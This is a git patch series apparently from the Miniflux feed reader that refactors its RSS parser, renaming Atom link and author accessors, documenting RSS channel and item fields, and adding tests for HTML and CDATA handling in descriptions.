@@ -91,11 +90,11 @@ func (r *RSSAdapter) BuildFeed(feedURL string) *model.Feed {
if entry.Title == "" {
entry.Title = sanitizer.TruncateHTML(entry.Content, 100)
}
-
if entry.Title == "" {
entry.Title = entry.URL
}
+ entry.Author = findEntryAuthor(&item)
if entry.Author == "" {
entry.Author = findFeedAuthor(&r.rss.Channel)
}
From 4834e934f2cf57b106923bd37d62d6c5f6f39f1f Mon Sep 17 00:00:00 2001
From: =?UTF-8?q?Fr=C3=A9d=C3=A9ric=20Guillot?=
Date: Fri, 15 Mar 2024 18:04:24 -0700
Subject: [PATCH 19/80] Remove some duplicated code in RSS parser
---
internal/reader/rss/adapter.go | 10 +-
internal/reader/rss/atom.go | 37 ++------
internal/reader/rss/parser_test.go | 100 ++++++++++++++++++++
internal/reader/rss/rss.go | 144 +++++++++++++++++++++++------
4 files changed, 227 insertions(+), 64 deletions(-)
diff --git a/internal/reader/rss/adapter.go b/internal/reader/rss/adapter.go
index 2909fc6b..531cc53f 100644
--- a/internal/reader/rss/adapter.go
+++ b/internal/reader/rss/adapter.go
@@ -39,7 +39,7 @@ func (r *RSSAdapter) BuildFeed(feedURL string) *model.Feed {
// Try to find the feed URL from the Atom links.
for _, atomLink := range r.rss.Channel.AtomLinks.Links {
- atomLinkHref := strings.TrimSpace(atomLink.URL)
+ atomLinkHref := strings.TrimSpace(atomLink.Href)
if atomLinkHref != "" && atomLink.Rel == "self" {
if absoluteFeedURL, err := urllib.AbsoluteURL(feedURL, atomLinkHref); err == nil {
feed.FeedURL = absoluteFeedURL
@@ -170,8 +170,8 @@ func findEntryURL(rssItem *RSSItem) string {
}
for _, atomLink := range rssItem.AtomLinks.Links {
- if atomLink.URL != "" && (strings.EqualFold(atomLink.Rel, "alternate") || atomLink.Rel == "") {
- return strings.TrimSpace(atomLink.URL)
+ if atomLink.Href != "" && (strings.EqualFold(atomLink.Rel, "alternate") || atomLink.Rel == "") {
+ return strings.TrimSpace(atomLink.Href)
}
}
@@ -233,8 +233,8 @@ func findEntryAuthor(rssItem *RSSItem) string {
author = rssItem.ItunesAuthor
case rssItem.DublinCoreCreator != "":
author = rssItem.DublinCoreCreator
- case rssItem.AtomAuthor.String() != "":
- author = rssItem.AtomAuthor.String()
+ case rssItem.AtomAuthor.PersonName() != "":
+ author = rssItem.AtomAuthor.PersonName()
case strings.Contains(rssItem.Author.Inner, "
+
+
+ Example
+ http://example.org/
+
+ Item 1
+ http://example.org/item1
+ this is <b>bold</b>
+
+
+ `
+
+ feed, err := Parse("https://example.org/", bytes.NewReader([]byte(data)))
+ if err != nil {
+ t.Fatal(err)
+ }
+
+ if feed.Entries[0].Content != `this is bold` {
+ t.Errorf("Incorrect entry content, got: %q", feed.Entries[0].Content)
+ }
+}
+
+// https://www.rssboard.org/rss-encoding-examples
+func TestParseEntryWithDescriptionWithHTMLCDATA(t *testing.T) {
+ data := `
+
+
+ Example
+ http://example.org/
+
+ Item 1
+ http://example.org/item1
+ bold]]>
+
+
+ `
+
+ feed, err := Parse("https://example.org/", bytes.NewReader([]byte(data)))
+ if err != nil {
+ t.Fatal(err)
+ }
+
+ if feed.Entries[0].Content != `this is bold` {
+ t.Errorf("Incorrect entry content, got: %q", feed.Entries[0].Content)
+ }
+}
+
+// https://www.rssboard.org/rss-encoding-examples
+func TestParseEntryDescriptionWithEncodingAngleBracketsInText(t *testing.T) {
+ data := `
+
+
+ Example
+ http://example.org/
+
+ Item 1
+ http://example.org/item1
+ 5 < 8, ticker symbol <BIGCO>
+
+
+ `
+
+ feed, err := Parse("https://example.org/", bytes.NewReader([]byte(data)))
+ if err != nil {
+ t.Fatal(err)
+ }
+
+ if feed.Entries[0].Content != `5 < 8, ticker symbol <BIGCO>` {
+ t.Errorf("Incorrect entry content, got: %q", feed.Entries[0].Content)
+ }
+}
+
+// https://www.rssboard.org/rss-encoding-examples
+func TestParseEntryDescriptionWithEncodingAngleBracketsWithinCDATASection(t *testing.T) {
+ data := `
+
+
+ Example
+ http://example.org/
+
+ Item 1
+ http://example.org/item1
+
+
+
+ `
+
+ feed, err := Parse("https://example.org/", bytes.NewReader([]byte(data)))
+ if err != nil {
+ t.Fatal(err)
+ }
+
+ if feed.Entries[0].Content != `5 < 8, ticker symbol <BIGCO>` {
+ t.Errorf("Incorrect entry content, got: %q", feed.Entries[0].Content)
+ }
+}
+
func TestParseEntryWithFeedBurnerLink(t *testing.T) {
data := `
diff --git a/internal/reader/rss/rss.go b/internal/reader/rss/rss.go
index 7935166d..bc99b461 100644
--- a/internal/reader/rss/rss.go
+++ b/internal/reader/rss/rss.go
@@ -16,29 +16,75 @@ import (
// Specs: https://www.rssboard.org/rss-specification
type RSS struct {
- Version string `xml:"rss version,attr"`
+ // Version is the version of the RSS specification.
+ Version string `xml:"rss version,attr"`
+
+ // Channel is the main container for the RSS feed.
Channel RSSChannel `xml:"rss channel"`
}
type RSSChannel struct {
- Title string `xml:"rss title"`
- Link string `xml:"rss link"`
- Description string `xml:"rss description"`
- Language string `xml:"rss language"`
- Copyright string `xml:"rss copyRight"`
- ManagingEditor string `xml:"rss managingEditor"`
- Webmaster string `xml:"rss webMaster"`
- PubDate string `xml:"rss pubDate"`
- LastBuildDate string `xml:"rss lastBuildDate"`
- Categories []string `xml:"rss category"`
- Generator string `xml:"rss generator"`
- Docs string `xml:"rss docs"`
- Cloud *RSSCloud `xml:"rss cloud"`
- Image *RSSImage `xml:"rss image"`
- TTL string `xml:"rss ttl"`
- SkipHours []string `xml:"rss skipHours>hour"`
- SkipDays []string `xml:"rss skipDays>day"`
- Items []RSSItem `xml:"rss item"`
+ // Title is the name of the channel.
+ Title string `xml:"rss title"`
+
+ // Link is the URL to the HTML website corresponding to the channel.
+ Link string `xml:"rss link"`
+
+ // Description is a phrase or sentence describing the channel.
+ Description string `xml:"rss description"`
+
+ // Language is the language the channel is written in.
+ // A list of allowable values for this element, as provided by Netscape, is here: https://www.rssboard.org/rss-language-codes.
+ // You may also use values defined by the W3C: https://www.w3.org/TR/REC-html40/struct/dirlang.html#langcodes.
+ Language string `xml:"rss language"`
+
+ // Copyright is a string indicating the copyright.
+ Copyright string `xml:"rss copyRight"`
+
+ // ManagingEditor is the email address for the person responsible for editorial content.
+ ManagingEditor string `xml:"rss managingEditor"`
+
+ // Webmaster is the email address for the person responsible for technical issues relating to the channel.
+ Webmaster string `xml:"rss webMaster"`
+
+ // PubDate is the publication date for the content in the channel.
+ // All date-times in RSS conform to the Date and Time Specification of RFC 822, with the exception that the year may be expressed with two characters or four characters (four preferred).
+ PubDate string `xml:"rss pubDate"`
+
+ // LastBuildDate is the last time the content of the channel changed.
+ LastBuildDate string `xml:"rss lastBuildDate"`
+
+ // Categories is a collection of categories to which the channel belongs.
+ Categories []string `xml:"rss category"`
+
+ // Generator is a string indicating the program used to generate the channel.
+ Generator string `xml:"rss generator"`
+
+ // DocumentationURL is a URL that points to the documentation for the format used in the RSS file.
+ DocumentationURL string `xml:"rss docs"`
+
+ // Cloud is a web service that supports the rssCloud interface which can be implemented in HTTP-POST, XML-RPC or SOAP 1.1.
+ Cloud *RSSCloud `xml:"rss cloud"`
+
+ // Image specifies a GIF, JPEG or PNG image that can be displayed with the channel.
+ Image *RSSImage `xml:"rss image"`
+
+ // TTL is a number of minutes that indicates how long a channel can be cached before refreshing from the source.
+ TTL string `xml:"rss ttl"`
+
+ // SkipHours is a hint for aggregators telling them which hours they can skip.
+ // An XML element that contains up to 24 sub-elements whose value is a number between 0 and 23,
+ // representing a time in GMT, when aggregators,
+ // if they support the feature, may not read the channel on hours listed in the skipHours element.
+ SkipHours []string `xml:"rss skipHours>hour"`
+
+ // SkipDays is a hint for aggregators telling them which days they can skip.
+ // An XML element that contains up to seven sub-elements whose value is Monday, Tuesday, Wednesday, Thursday, Friday, Saturday or Sunday.
+ SkipDays []string `xml:"rss skipDays>day"`
+
+ // Items is a collection of items.
+ Items []RSSItem `xml:"rss item"`
+
AtomLinks
itunes.ItunesChannelElement
googleplay.GooglePlayChannelElement
@@ -64,16 +110,56 @@ type RSSImage struct {
}
type RSSItem struct {
- Title string `xml:"rss title"`
- Link string `xml:"rss link"`
- Description string `xml:"rss description"`
- Author RSSAuthor `xml:"rss author"`
- Categories []string `xml:"rss category"`
- CommentsURL string `xml:"rss comments"`
- Enclosures []RSSEnclosure `xml:"rss enclosure"`
- GUID RSSGUID `xml:"rss guid"`
- PubDate string `xml:"rss pubDate"`
- Source RSSSource `xml:"rss source"`
+ // Title is the title of the item.
+ Title string `xml:"rss title"`
+
+ // Link is the URL of the item.
+ Link string `xml:"rss link"`
+
+ // Description is the item synopsis.
+ Description string `xml:"rss description"`
+
+ // Author is the email address of the author of the item.
+ Author RSSAuthor `xml:"rss author"`
+
+ // <category> is an optional sub-element of <item>.
+ // It has one optional attribute, domain, a string that identifies a categorization taxonomy.
+ Categories []string `xml:"rss category"`
+
+ // <comments> is an optional sub-element of <item>.
+ // If present, it contains the URL of the comments page for the item.
+ CommentsURL string `xml:"rss comments"`
+
+ // <enclosure> is an optional sub-element of <item>.
+ // It has three required attributes. url says where the enclosure is located,
+ // length says how big it is in bytes, and type says what its type is, a standard MIME type.
+ Enclosures []RSSEnclosure `xml:"rss enclosure"`
+
+ // <guid> is an optional sub-element of <item>.
+ // It's a string that uniquely identifies the item.
+ // When present, an aggregator may choose to use this string to determine if an item is new.
+ //
+ // There are no rules for the syntax of a guid.
+ // Aggregators must view them as a string.
+ // It's up to the source of the feed to establish the uniqueness of the string.
+ //
+ // If the guid element has an attribute named isPermaLink with a value of true,
+ // the reader may assume that it is a permalink to the item, that is, a url that can be opened in a Web browser,
+ // that points to the full item described by the <item> element.
+ //
+ // isPermaLink is optional, its default value is true.
+ // If its value is false, the guid may not be assumed to be a url, or a url to anything in particular.
+ GUID RSSGUID `xml:"rss guid"`
+
+ // <pubDate> is the publication date of the item.
+ // Its value is a string in RFC 822 format.
+ PubDate string `xml:"rss pubDate"`
+
+ //